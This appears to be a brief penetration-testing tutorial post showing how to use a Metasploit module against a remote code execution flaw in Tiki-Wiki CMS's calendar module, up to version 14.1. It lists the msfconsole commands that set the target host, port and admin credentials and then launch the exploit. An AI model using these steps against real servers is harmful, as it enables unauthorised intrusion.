Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution

Tiki-Wiki CMS’s calendar module contains a remote code execution vulnerability within the viewmode GET parameter. The calendar module is NOT enabled by default. If enabled, the default permissions are set to NOT allow anonymous users to access. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14 Verified/Tested against 14.1

 Exploit Targets

tiki-wiki 14.1


Attacker: kali Linux

Victim PC: Linux,Windows

Open Kali terminal type msfconsole

Now type use exploit/linux/http/tiki_calendar-exec

msf exploit (tiki_calendar_exec)>set targeturi /tiki

msf exploit (tiki_calendar_exec)>set rhost (IP of Remote Host)

msf exploit (tiki_calendar_exec)>set username admin

msf exploit (tiki_calendar_exec)>set password raj123

msf exploit (tiki_calendar_exec)>set rport 81

msf exploit (tiki_calendar_exec)>exploit          

Leave a Reply

Your email address will not be published. Required fields are marked *